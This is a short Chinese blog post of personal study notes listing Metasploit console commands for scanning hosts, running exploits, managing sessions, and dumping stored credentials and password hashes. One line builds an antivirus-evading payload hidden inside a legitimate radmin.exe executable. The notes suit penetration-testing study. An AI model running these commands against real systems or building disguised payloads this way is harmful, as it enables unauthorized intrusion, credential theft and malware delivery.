欢迎光临散文网 会员登陆 & 注册

metasploit基本操作

2019-11-16 12:43 作者:707才不会沉迷B站  | 我要投稿

connect 192.168.1.1
show options
search ms10-046
search path:mysql
info
back
set RHOST 192.168.1.1
unset
setg    // set global
unsetg
check
db_status
db_nmap 192.168.1.1
db_nmap -A 192.168.1.1
db_connect -y /usr/share/metasploit-framework/config/database.yml
hosts
hosts -u
hosts -S Windows
services
services -p 445
search mysql_login
creds   // show credentials
vulns   // show vulnerabilities
loot    // show hash password
db_export
db_import
save    // save config
exploit
exploit -j  // run background
jobs
show payloads
set payloads xxx
sessions
sessions -l
sessions -i 2
load openvas
load nessus
unload openvas
route add   // set session number
resource    // set resource

use exploit

use payload
generate
generate -b '\x00'
show encoders
generate -e x86/nonalpha
generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
generate -n 14  // 14 nops
generate -f c

use auxiliary/scanner
db_nmap 192.168.74.0/24
db_nmap -sV 192.168.74.0/24
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/portscan/syn

use auxiliary/scanner/ip/ipidseq    // idle ipid
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/sniffer/psnuffle
kill 0  // kill id
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/smb/*


metasploit基本操作的评论 (共 条)

分享到微博请遵守国家法律